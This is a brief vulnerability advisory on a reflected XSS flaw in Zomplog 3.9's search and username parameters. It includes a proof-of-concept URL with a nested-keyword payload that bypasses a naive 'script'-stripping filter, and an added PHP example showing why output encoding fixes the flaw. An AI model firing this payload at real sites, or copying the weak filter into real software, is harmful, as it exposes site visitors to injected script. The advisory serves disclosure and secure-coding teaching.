Zomplog 3.9 XSS exploit-vulnerability warning-the black bar safety net

2010-04-12T00:00:00
ID MYHACK58:62201026697
Type myhack58
Reporter Anonymous
Modified 2010-04-12T00:00:00

Description

Vulnerable file: index.php

Vulnerability code:

    // some general xxs protection
    $_GET['search'] = str_replace('script', '', $_GET['search']);
    $_GET['username'] = str_replace('script', '', $_GET['username']);

The code only removes the keyword "script", so the page is still vulnerable to XSS attacks.

POC http://www.site.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt>\
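
The following is an added example, not code from Zomplog or from the original advisory. It runs the advisory's PoC value through the same str_replace() call and through output encoding, to show why the keyword filter fails and what the fix looks like. The function names are hypothetical, and it assumes the search value is echoed into an HTML body or a quoted attribute.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helper names, not Zomplog's own code.

// Same operation as the index.php lines above: str_replace() makes one
// left-to-right pass and never rescans the text it has just produced,
// so removing the inner keyword can assemble a new one from what remains.
function keyword_strip(string $value): string
{
    return str_replace('script', '', $value);
}

// Output encoding for HTML body text and quoted attribute values.
// Assumption: the value is echoed into one of those two contexts.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// True when the string can still open a tag or close a quoted attribute.
function can_break_out(string $value): bool
{
    return strpbrk($value, '<>"\'') !== false;
}

$inputs = [
    'benign term (constructed)'   => 'summer holiday photos',
    'PoC value from the advisory' => '"><scrscriptipt>alert(1)</scrscriptipt>',
];

foreach ($inputs as $label => $raw) {
    $stripped = keyword_strip($raw);
    $encoded  = html_encode($raw);

    printf("%s\n", $label);
    printf("  keyword strip : %s (markup survives: %s)\n",
        $stripped, can_break_out($stripped) ? 'yes' : 'no');
    printf("  output encode : %s (markup survives: %s)\n",
        $encoded, can_break_out($encoded) ? 'yes' : 'no');
}
```

Encoding is applied where the value is written into the page, not by rewriting $_GET, so the stored or searched value stays intact and every output context gets the escaping it needs.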